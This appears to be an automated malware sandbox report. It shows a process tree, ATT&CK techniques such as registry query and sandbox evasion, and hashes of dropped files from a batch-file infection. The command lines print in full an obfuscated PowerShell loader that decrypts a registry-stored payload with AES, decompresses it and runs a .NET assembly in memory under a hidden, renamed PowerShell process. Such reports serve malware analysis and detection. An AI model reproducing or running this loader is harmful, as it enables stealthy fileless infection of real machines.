'')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:4868

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6384).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:3792

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 480 -p 1544 -ip 1544
1⤵
PID:5696

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1544 -s 836
1⤵
- Program crash
PID:5660

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\0f0a53c4-52be-4e7e-af1c-451e4142e75b.tmp
Filesize
12KB

MD5
99a838778ec7b85ee9657470e29e06d1

SHA1
38f8bdd5c36c93c33d760c48e90ebcfdba757876

SHA256
a965c2712762b371b126400bf2123949e25db8aa3d62fc34fc3f9f252e964922

SHA512
207d49749c132bfe4c468fcc830a8483116408ca337dea4897e54115030dbc548c0ea5d4c3e0b7c471d0e1a3d6acdf9e47042b21bbca75616eadde9a3718a625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
78c7656527762ed2977adf983a6f4766

SHA1
21a66d2eefcb059371f4972694057e4b1f827ce6

SHA256
e1000099751602ae1adcec6f1c74e1d65f472936817b45239dfed4b043984296

SHA512
0a8e58ae95163b3cdf8e81b5085887761e73cb7c836a1a6a972e837fb3df69b2ac70cfd6311d06d40656344ec35eb48e512f007561480f0345486ac2b329be0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
099b4ba2787e99b696fc61528100f83f

SHA1
06e1f8b7391e1d548e49a1022f6ce6e7aa61f292

SHA256
cdb1db488e260ed750edfe1c145850b57ee8ab819d75237a167e673116a33ee8

SHA512
4309375e10785564ceb03e0127ced414e366a5b833f16a60d796471d871b479e4c044db5268902d9dfd14715ca577cb26042bab8f7b0f31fe8abf33947feb9d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
2629815d0b871be92ff2c4e1b0737937

SHA1
4b83fb55454aaadc5c3347eaf22c9a920876c597

SHA256
adfb80418b8fca3bcc62da01597ac056ea995fbcf1a0748a52b96948caf3ee91

SHA512
e5d6907729126ca63156877553c0bb1a30f8bbac1db76e712395eb828d16755192ecfdc3f1cd0e42aadd69eae11a7a54eacf6aef04e0d658da73aaf93b536d62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe56f60d.TMP
Filesize
48B

MD5
a15d0e63a67d10c7c5a8564f2c055492

SHA1
2f57fcaf212abd5dece240755f9199681498220d

SHA256
ac854bd80dc478648ca4135adb38088ed2229651e36842ec629b00cfcb0196ed

SHA512
3385f1ae70b319cfb52054f90447f77c4b59201d72a7acf651f046282b38a2bc27a395c4f1594efb8037fb27678b6460f70f1c5647db6febd53cd2eb64824cb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
5eb34d7f566c3ce9a93fc4663d015c40

SHA1
a868afad0abaab847c1d7f4a5108b1933fd1149b

SHA256
db674f6f6c19c53ef3e1209fd17a07fe424e153db217d4183d76d53db3b7798b

SHA512
9ba591c997dd15074628b6c6b1e12697fbf65f2c6dded5b5f1bca39790c53d38abfa7efada4b340b346faf7118bf47cf476a0fc7d21bbaa4ef86e8285cfd0130

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
11KB

MD5
6dc61ca3abadb2a0122e5844086311c3

SHA1
41025b1f56e8a28c49759470401b156d96f9092b

SHA256
252b661b1cee43e251b6dc35144dffdbf7437901578dc5599343125a5f4ccab4

SHA512
9932e5240d215009c16a513df036ee0735e341b7f29a695483faf7d69b099d90799da59882a34e9cf922816c2f587513e387942a637680a851e419986af8d34e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
4KB

MD5
f80778949946edb659b7794abe89cd9a

SHA1
cc95ef1b21e1390c39300770a12848ce7db25fd4

SHA256
e1995ecf7bdbe3da023a04c9f2f3e6f51e23a674373afd53caea45830fbb6ec9

SHA512
bcf2184777ce6b4fcba08a280c777d9caf70a607e22c7379365bed42a96c18a85a63e5e79f2b8c1d4fb1a30fdb7c384cf8bd1cdfae8ae79f05eb228a64673240

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
15KB

MD5
3a4ccea247a4dacd2e821f7ee8053708

SHA1
edc583f4889a262733e0db0d1f7f00b180cc07ea

SHA256
666568dbc79dc003420fd2df4c84f9c9c60bccbd70d72c35ed02f95f5f9b47b0

SHA512
4bb991bf3b5570d7cdf441b0174734f1049adf68a7687b005b69eee901785d180a2d39794959f90e5b1777c213c04168a9e15784758d9cf3d0c8c6e5da147824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
17KB

MD5
5fc51a0041f3526b2c87195296056220

SHA1
5f62cfb01b09aca2eedac04451be6bdf38d52ee5

SHA256
a2efee3bc0d1c36328d9999d5b56a7a41819b3063ff894261b63594b9e40af6e

SHA512
f5a79cabe80abd9edc0f8ffd58b93b390598f2cea792f1dfa68cdec1f7c3888ae3a721089b2645202bfa8d3e4d98fbd4c8b7c64703a32118751933f79dbf23bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
19KB

MD5
9e0cd37912d551bfe27e67235e0490e1

SHA1
a80d4d8a927d88bc9370a3c8eba36e5d34f78f15

SHA256
aa030df52f7a9a493cdedee159ec6ed44d42a14e022672bad1722599968001a9

SHA512
5e0a0660ec066432a0fe0879e905df79321eeb400c863686c7d38b441220158853d817f264bf600a1683bee21410be362f78e041a1067d7e23b073336cdf2e23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
02ee7addc9e8a2d07af55556ebf0ff5c

SHA1
020161bb64ecb7c6e6886ccc055908984dc651d8

SHA256
552d3ed359b7a52278ce621674d16428d8a7969f6cd5663df18e240cce66aadc

SHA512
567989543c3848a0c3276d96b96ca761f750e4b71fb74f36d809f590ffe16a72fd5ece251737a8b1ffe65f0051e211bd7ad19d2b8b0b7ca1b7ffc86dd2a52883

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
4KB

MD5
379a89d094bfae259e958c2a6f0d2009

SHA1
a5bbb4623fd665b847e0578d8dcc8758ac05ec2d

SHA256
13d6a72de884b5aea8ed94118b800a3293727b162a6f9e0d0eed92a959ae62b9

SHA512
6c58bf413336f5fa9399c4ce5462f68fa68ae66da27db051be229838bb43074f956305cf2eff38ed81347f55759873f10502ed543c513b2f06e8b9ccc66545d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe56d4e9.TMP
Filesize
2KB

MD5
8c1dbdccd41af7a2fdf801a374f7bf3c

SHA1
4fede5a5feb566368bfa9e0e12502a7d7f997ba9

SHA256
fefdc9022e1adcb64eaefdb090eb8624566d2ef53391bc703fdb909f19aedaf8

SHA512
5467a2488c0ce7b2d812132c89a8091462ce7fcdf907500c098e326e03667d4bc5105891eb3fd71a1fe9ecd10d152a4d168432780737ad7e3be7e9885d8fb879

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
9KB

MD5
e2094fb649d75314b15aa75153de3fbb

SHA1
8b5d332afd5bdfcbf8776f21be79b4363827ebad

SHA256
0c8f441de4073cc7fe157fd3737905b9442dbfb2504e34c728e9bf2ff8fc06d3

SHA512
81a8c3863badd14cbca1368c9aaa5d499dc54cf467ef64406414148245c87eb31fb5f071aba3ad87079782bc2be8b2af03ca5e699a73c167986b4357f43243f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
88078776982ec40523fba91f883768b7

SHA1
97e3ee996f5e8c9e7be918038de2954c0ced15b2

SHA256
d02d444cfa06c897dc48e7f139364b7ab89b110ab51a3fab22fa5b26de04bc05

SHA512
ec23dd88e572864c443c3fdd0fa00080b592923d9016b498212659f8d034ba82ea3f6e9ca904b4f3e9259217ee65b805c509eb87144d7604f64d545058489d64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
4c17372abffa8ec42cfecf6691f61bfa

SHA1
60d82c7e0757cb149cc9fd832b8de08a1c695c0b

SHA256
c9e86a0fa90349ae3d9b89767274728b9cb75bd3772d627c722280e997d6972e

SHA512
ae0026fdbd42a7fb31bc67f57170a17547a93216747b5219c7a740bb66fe76a90f164591e269871f6750e63b1b3a98849f6e5e0ebfc8a4f9f3fb291e52718b59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
Filesize
264KB

MD5
8005597930d47ac98e65d3a15f76c22e

SHA1
14c80b1c766cea50e75a09ce9d1a9ecde837a86e

SHA256
0d70d2ee7c5482006d2948e639b691080898c2ce96febebdcef8e5fad2e4bbc3

SHA512
b5fb08cf570e382ea034faf2d6227f9219440ffe95157f1c40a2b3be7852848557815bc2af9d2e39ebfae6561902c2ab7bad5ccfe3ab9f176d18e2b186f2a890

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\5352c375-9aa2-426c-83e1-b486588001ac.bat
Filesize
11.6MB

MD5
a4ab58b4195e5696082165a704bb0b62

SHA1
7ac4eefc27f236f4f0cc5d30c6f5e59921674722

SHA256
c1fc31bf1f1669b48dece9951f2b895f75ce0e1dd3e516c02d4624ff7c60e6e3

SHA512
67891ced4353c3b7c86f2ec2a5652fe195467e309c1d02f0c5d91e56b7cd592906b6cfe3cbdeef7f228b4b021abe5effd45a63916aa799acd7d56ef7d60ae239

Download Submit
C:\Users\Admin\AppData\Local\Temp\5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
